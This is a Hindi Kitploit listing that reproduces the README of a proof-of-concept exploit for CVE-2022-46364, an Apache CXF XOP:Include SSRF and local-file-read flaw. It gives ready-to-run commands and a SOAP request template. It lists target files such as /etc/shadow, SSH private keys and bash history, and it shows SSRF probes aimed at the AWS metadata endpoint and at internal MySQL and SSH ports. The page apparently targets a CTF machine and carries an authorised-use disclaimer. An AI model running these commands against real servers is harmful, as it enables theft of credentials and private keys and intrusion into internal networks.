Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-46364-poc — CVE-2022-46364 Apache CXF XOP:Include SSRF / LFI | Kitploit
उपकरण/GitHubGitHub/0xmid00/cve-2022-46364-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंगपेनिट्रेशन टेस्टिंग
GitHub0xmid00/cve-2022-46364-poc

CVE-2022-46364-poc

CVE-2022-46364 Apache CXF XOP:Include SSRF / LFI

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-46364 — Apache CXF XOP:Include SSRF / LFI

लेखक: 0xmid00
भेद्यता: XOP:Include के माध्यम से SSRF / स्थानीय फ़ाइल पढ़ना (MTOM अनुरोधों में)
प्रभावित: Apache CXF < 3.5.5 और < 3.4.10


भेद्यता क्या है?

Apache CXF MTOM (Message Transmission Optimization Mechanism) संदेशों को संसाधित करता है जिनमें XOP:Include तत्व होते हैं। XOP:Include का href विशेषता उसी MTOM मल्टीपार्ट संदेश के भीतर एक संलग्नक को संदर्भित करने वाली होती है।

हालाँकि, कमज़ोर संस्करणों में, CXF href में दिए गए किसी भी URI का अनुसरण करेगा, जिनमें शामिल हैं:

  • file:///etc/passwd → स्थानीय फ़ाइलें पढ़ता है (LFI)
  • http://127.0.0.1:PORT/ → आंतरिक सेवाओं की जाँच करता है (SSRF)

एक हमलावर को इसे ट्रिगर करने के लिए किसी भी प्रकार का कम से कम एक पैरामीटर वाला SOAP अनुरोध भेजना होता है।


आवश्यकताएँ

root@kitploit:~
pip install requests

उपयोग

root@kitploit:~
python3 exploit.py -r request.txt [options]

तर्क

तर्कविवरण
-r, --requestरॉ HTTP अनुरोध फ़ाइल का पथ (आवश्यक)
--mode 1/etc/passwd का उपयोग करके इंजेक्ट करने योग्य XML फ़ील्ड का स्वतः पता लगाएं
--mode 2फ़ाइल पथों की एक वर्डलिस्ट को फ़ज़ करें
--field NAMEइंजेक्ट करने के लिए XML फ़ील्ड निर्दिष्ट करें (स्वतः पता लगाना छोड़ें)
--wordlist PATHमोड 2 के लिए फ़ाइल वर्डलिस्ट का पथ
--read PATHएक विशिष्ट फ़ाइल को पढ़ें
-v, --verboseविस्तृत अनुरोध जानकारी दिखाएं

अनुरोध फ़ाइल प्रारूप

अपने रॉ HTTP अनुरोध को ठीक उसी तरह .txt फ़ाइल में सहेजें जैसे कैप्चर किया गया था (जैसे Burp से):

root@kitploit:~
POST /employeeservice HTTP/1.1
Host: devarea.htb:8080
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Connection: close
Content-Length: 487

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:tns="http://devarea.htb/">
  <soapenv:Body>
    <tns:submitReport>
      <arg0>
        <confidential>false</confidential>
        <content>test</content>
        <department>IT</department>
        <employeeName>john</employeeName>
      </arg0>
    </tns:submitReport>
  </soapenv:Body>
</soapenv:Envelope>

एक्सप्लॉइट स्वचालित रूप से इसे MTOM प्रारूप में परिवर्तित करता है — आपको इसे मैन्युअल रूप से करने की आवश्यकता नहीं है।


उदाहरण

मोड 1 — सभी इंजेक्ट करने योग्य फ़ील्ड का स्वतः पता लगाएं

root@kitploit:~
python3 exploit.py -r request.txt --mode 1

प्रत्येक लीफ XML तत्व में file:///etc/passwd इंजेक्ट करने का प्रयास करता है और रिपोर्ट करता है कि कौन से फ़ाइल सामग्री लौटाते हैं।


मोड 1 — एक विशिष्ट फ़ील्ड का परीक्षण करें

root@kitploit:~
python3 exploit.py -r request.txt --mode 1 --field content

मोड 2 — फ़ाइलों को फ़ज़ करें (पहले फ़ील्ड का स्वतः पता लगाएं)

root@kitploit:~
python3 exploit.py -r request.txt --mode 2 --wordlist lfi.txt

पहले इंजेक्ट करने योग्य फ़ील्ड खोजने के लिए मोड 1 चलाता है, फिर उस फ़ील्ड के माध्यम से वर्डलिस्ट में सभी पथों को फ़ज़ करता है।


मोड 2 — ज्ञात फ़ील्ड के साथ फ़ाइलों को फ़ज़ करें (सबसे तेज़)

root@kitploit:~
python3 exploit.py -r request.txt --mode 2 --field content --wordlist lfi.txt

फ़ील्ड पता लगाना छोड़ता है और सीधे फ़ज़िंग पर चला जाता है।


एकल फ़ाइल पढ़ना

root@kitploit:~
python3 exploit.py -r request.txt --field content --read /home/dev_ryan/.ssh/id_rsa

वर्डलिस्ट उदाहरण (lfi.txt)

root@kitploit:~
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/proc/self/environ
/proc/self/cmdline
/home/dev_ryan/.ssh/id_rsa
/home/dev_ryan/.bash_history
/home/dev_ryan/.bashrc
/root/.ssh/id_rsa
/root/.bash_history
/var/log/auth.log
/var/log/syslog

आप SecLists का भी उपयोग कर सकते हैं:

root@kitploit:~
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

यह कैसे काम करता है

  1. रॉ HTTP अनुरोध फ़ाइल को पार्स करता है
  2. SOAP बॉडी में लक्ष्य XML फ़ील्ड का पता लगाता है
  3. इसकी सामग्री को <xop:Include href="file:///..."/> से बदलता है
  4. अनुरोध को MTOM मल्टीपार्ट प्रारूप में लपेटता है (CXF के XOP प्रोसेसर को सक्रिय करने के लिए आवश्यक)
  5. अनुरोध भेजता है — CXF फ़ाइल लाता है और इसकी सामग्री base64-एन्कोडेड लौटाता है
  6. डिकोड करता है और परिणाम प्रिंट करता है

SSRF मोड

फ़ाइलों को पढ़ने के बजाय आंतरिक HTTP सेवाओं की जाँच करने के लिए:

root@kitploit:~
python3 exploit.py -r request.txt --field content --read http://127.0.0.1:8080/

या --read मान को किसी भी आंतरिक URL के साथ संपादित करें:

root@kitploit:~
--read http://169.254.169.254/latest/meta-data/   (AWS मेटाडेटा)
--read http://127.0.0.1:3306/                      (MySQL)
--read http://127.0.0.1:22/                        (SSH बैनर)

अस्वीकरण

यह उपकरण केवल अधिकृत पैठ परीक्षण और CTF चुनौतियों के लिए है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें